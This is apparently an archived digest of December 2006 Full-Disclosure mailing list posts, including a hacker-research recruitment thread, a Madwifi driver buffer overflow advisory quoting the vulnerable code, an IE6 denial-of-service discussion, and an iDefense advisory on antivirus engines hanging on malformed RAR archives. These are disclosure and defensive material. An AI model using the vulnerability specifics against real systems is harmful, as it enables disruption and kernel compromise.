currently conducting a study of hackers > and hacking and am seeking interested men and women who may be willing to > participate." - "participate"?? *raises eyebrows* men hacking women? *raises-hand* me me! "The purpose of this research is to understand the ways that > people become interested in computers and hacking" - actually there is no "way". if you grow up around computers, you start to like them and experiment with them more (applies to women as well. *epiphany* so THAT's why I could never get to experiment with them in high school!!!!). If you grow up in a family full of doctors, chances are, you'll become a doctor and be quite good at it as well ("chances are", not "YOU WILL") So I think you have the answer already. Just think on how YOU became an Assistant Professor, and how you now have a PhD and apply it to the other people with a different interest. "I have obtained a Certificate of > Confidentiality from the National Institutes of Health to further protect > and ensure your privacy and confidentiality." - of Health?? to ensure privacy?? something's not right. in fact, something smells fishy!!!! (btw, fish sauce is very good with beef boiled for a loooong time with onions. and some salt. and whatever suits your fancy) "than simple media > conceptions of the hacker as a criminal." - nope that's not true now. at least it was a few years ago, but then again that is just my opinion, and I believe the media has grown to respect the "hackers" and have made a distinction between the "hackers" and the Russian-mafia-chinese-mafia-whatever-mafia-releasing-0-days-and-attacking-organizations-or-those-sites-with-drive-by-downloadings-and-shit. " hear crazy stories about how you hacked NASA. > If you have," - no, but I have read some crazy-ass stories by a Tom Holt (a lot like Harry Potter, although I prefer Harry Potter, err, i mean I prefer the story of Harry Potter, especially all the parts with Hermione. grrrrrrrroowllll) growling, "swing and stretch. secrets to making great noodles" On 12/8/06, Thomas Holt wrote: > > > > Greetings, > My name is Tom Holt, and I am an Assistant Professor at the University of > North Carolina at Charlotte. I am currently conducting a study of hackers > and hacking and am seeking interested men and women who may be willing to > participate. The purpose of this research is to understand the ways that > people become interested in computers and hacking, their motives for > hacking, and how they apply their skills in different settings. This study > will also consider individuals' conceptions of hacking and experiences in > hacker culture. > > To understand this phenomenon, I am seeking individuals who are willing to > share their experiences and opinions in an interview which can be conducted > either in person or via encrypted e-mail. Strict confidentiality will be > maintained and your privacy ensured. I have obtained a Certificate of > Confidentiality from the National Institutes of Health to further protect > and ensure your privacy and confidentiality. All individuals who complete an > interview will be paid $10 for their time, and $10 will also be paid for > successful referrals. > > If you know anyone who is, or considers his/herself to be a hacker and is > willing to be interviewed, please contact me via email at tjholt at uncc.edu, > at researchonhackers at yahoo.com, or by phone at 704-795-9544. Again, strict > confidentiality will be maintained and your privacy ensured. > > I am not a law enforcement agent nor connected with any law enforcement > agency and am not looking to hear crazy stories about how you hacked NASA. > If you have, great, but I realize there is more to hacking than simple media > conceptions of the hacker as a criminal. Instead, I am interested in > understanding hacking from the hackers' point of view. I have presented my > research and described this project at several cons, including CarolinaCon > 06, PhreakNIC X, and Defcons 13/14 and am hoping to hear from more > individuals in the community. > > > Please contact me if you are interested, and I look forward to hearing from > you. > > Thank you, > > Thomas J. Holt, Ph. D. > > > > ________________________________ > Have a burning question? Go to Yahoo! Answers and get answers from real > people who know. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From tyoptyop at gmail.com Fri Dec 8 19:08:48 2006 From: tyoptyop at gmail.com (Tyop?) Date: Fri, 8 Dec 2006 20:08:48 +0100 Subject: [Full-disclosure] [Madwifi] Madwifi SIOCGIWSCAN buffer overflow // France Telecom Message-ID: <985b1a3d0612081108k1b5631e9g49f639e2f9284d09@mail.gmail.com> Name: Madwifi SIOCGIWSCAN buffer overflow Vendor: http://www.madwifi.org Release date: December, 7th 2006 CVE ID: CVE-2006-6332 Authors: Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES 1. Description There is a buffer overflow in the madwifi Atheros driver in some functions called by SIOCSIWSCAN ioctl. This issue is remotely exploitable because ioctl SIOCSIWSCAN may be called automatically by some connexion managers (either directly, by using iwlib or by calling iwlist) when trying to get a list of nearby access points. 2. Details There is a stack buffer overflow in both the giwscan_cb() and encode_ie() functions (ieee80211_wireless.c). The first issue, in giwscan_cb, is related with insufficient checks on the length in some 802.11 information elements which are controlled by the attacker: memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2); The second issue is improper boundary checks in encode_ie() where ielen is never checked with bufsize. for (i = 0; i < ielen && bufsize > 2; i++) p += sprintf(p, "%02x", ie[i]); A properly crafted 802.11 beacon or probe response frame will trigger the bug when a process tries to get scanning results by calling ioctl SIOCGIWSCAN. The information element used by the attacker can be either WPA IE, RSN IE, WMM IE or ATH IE and will lead to a kernel stack overflow. 3. Vendor status The vendor was notified on December, 6th 2006 and issued version 0.9.2.1 to correct the issue. 4. Authors Laurent BUTTI Jerome RAZNIEWSKI Julien TINNES -- Tyop? From michael.holstein at csuohio.edu Fri Dec 8 19:57:40 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 08 Dec 2006 14:57:40 -0500 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: <4579C3B4.6040609@csuohio.edu> Wouldn't the best way to do this to be find a way to get friendly with the State's board of Probation & Parole? .. survey the folks that got caught so they can tell you about it. Folks that haven't gotten caught are obviously not all that bright if they chat it up about their misdeeds. That said .. I've had some interesting discussions with the botnet kiddies by reverse-engineering their malware and lurking in the appropriate IRC channel (just do it from a separate dialup connection, lest you get DDOS'ed). Usually the "why" question is answered with a variation of "because I could.." or "boredom" or both. Cheers, Michael Holstein CISSP GCIA Cleveland State University PS: I hate to be the one to point this out, but nothing will protect your "confidential" research from a subpoena. From nicolas.ruff at gmail.com Fri Dec 8 18:24:03 2006 From: nicolas.ruff at gmail.com (Nicolas RUFF) Date: Fri, 08 Dec 2006 19:24:03 +0100 Subject: [Full-disclosure] What was the name of the web site ... In-Reply-To: <45796948.8070604@telekom.yu> References: <45796948.8070604@telekom.yu> Message-ID: <4579ADC3.5010607@gmail.com> > ... that keeps track of MS vulnerabilities, patches and the > corresponding exploits? > > I know that it was mentioned earlier in this list but can not remember > the URL right now... elsenot.com ? Seems to be inactive til March :( -nicolas- From noodle.mastah at gmail.com Fri Dec 8 17:46:58 2006 From: noodle.mastah at gmail.com (chinese soup) Date: Fri, 8 Dec 2006 18:46:58 +0100 Subject: [Full-disclosure] Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.) In-Reply-To: References: <45766AB6.2080807@gmail.com> Message-ID: (waiting for the deluge of other lemmings who go: "it works on blahblah with SPblahblah" "confirmed on blahblah with blahblah language" "blablah did not work for me blahblah" can't you just find out the cause and not test EVERY version of IE that you have? I mean, yeah, ok, so you tested it on IE7 yeah big deal. he reports it on IE6. you know why it is "putting iexplore.exe at 100% CPU"? It's like when a truck crashes into a car and everyone goes out and tests the truck against their own cars: "Hey, the truck also totally destroyed my Ford Explorer!" "Oh, it also totalled my Toyota!". "Nope, it had no effect on my tank" yeah i mean i COULD test it, but i'm too busy with... ehrm... cooking. yes cooking. cooking, "i like my noodles boiled, not fried. well, sometimes fried" On 12/7/06, Andrius Paurys wrote: > On 12/6/06, Jos? Carlos Nieto Jarqu?n wrote: > > Note: > > I'm sorry, two of the the exploits in the prior e-mail were incomplete. > > > > This is just another couple of proof of concept exploits for this > > well-known browser. The third one is a lame combination of both. > > > > Tested under Windows XP SP2, MSIE 6.0.2900.2180 > > > Also confirmed working on Windows Server 2003 R2 (Build 3790) with > Internet Explorer 7.0.5730.11 > > 1st exploit was working fine putting iexplore.exe at 100% CPU. It > complained about "IE restricting this web page from running scripts" > (probably because of enabled Internet Explorer Enhanced Security > Configuration), but if you click "allow this website to run this" > (which is enabled by default if above mentioned IE ESC is not present) > it works. > > 2nd and 3rd were not exactly working, (also because of IE ESC) because > after clicking allow after several windows it was asking again, but > should work on WinXP and IE7. > > > > -- > Andrius Paurys > $h at MAN > > andrius.paurys at gmail.com > Tel.: +37067449273 > ICQ: 279424019 > MSN: andrius.paurys at gmail.com > http://shaman.tinkle.lt/ > > I'm Lithuanian, what's _your_ excuse? > S?di programeris nevalg?s ir nieko... > From labs-no-reply at idefense.com Fri Dec 8 22:56:23 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 08 Dec 2006 17:56:23 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.08.06: Multiple Vendor Antivirus RAR File Denial of Service Vulnerability Message-ID: <4579ED97.2060809@idefense.com> Multiple Vendor Antivirus RAR File Denial of Service Vulnerability iDefense Security Advisory 12.08.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 08, 2006 I. BACKGROUND AntiVirus products typically handle searching files for known viruses within their scan engines. Most scan engines support searching inside of known archive types for viruses as well. For more information refer to any of the popular AntiVirus vendors' web sites. II. DESCRIPTION Remote exploitation of a denial of service vulnerability in Multiple Vendors' Antivirus engines allows an attacker to cause the engines to consume excessive resources. The affected vendors' scan engines are vulnerable to a DoS attack when scanning specially malformed RAR archives. Specifically, the malformed archives will have the head_size and pack_size fields set to zero in Archive Header section. When such a file is encountered, the affected scan engines will enter an infinite loop. III. ANALYSIS Successful exploitation will allow an attacker to cause the affected scan engine to consume excessive CPU, and in some cases memory, resources. The malicious RAR file would need to be uploaded to a server to initiate the attack. Several common ways this could be achived are e-mail attachments, available network shares, FTP accounts, or Web form uploads. The impact of the vulnerability varies slightly from vendor to vendor as described below. Sophos: Scanning of archives is not enabled by default and must be specified by the user. This denial of service attack will prevent the scanner from scanning other files on disk while it is stuck on the exploit file. The hung process can be stopped by the user. Trend Micro: Once attacked, the scan engine will consume 99 percent of CPU resources and the affected computer will require a reboot to recover from the condition. The scan engine process cannot be forced to quit, although its thread priority can be lowered to regain some use of the system before reboot. IV. DETECTION iDefense has confirmed this vulnerability exists in the following vendors' products. This should not be considered an exhaustive list as these vendors tend to include the scan engine in many of their products. Previous versions are likely to be affected as well. * Sophos Small business edition (Windows/Linux) 4.06.1 with engine version 2.34.3. * Trend Micro PC Cillin - Internet Security 2006 * Trend Micro Office Scan 7.3 * Trend Micro Server Protect 5.58 V. WORKAROUND For Sophos' scan engine, this exploit will not have any effect if the "Enabled scanning of archives" option is not set. iDefense is currently unaware of a workaround for this issue for the remaining vendor's engines. VI. VENDOR RESPONSE Sophos has addressed this problem with new versions of their products. See http://www.sophos.com/support/know

back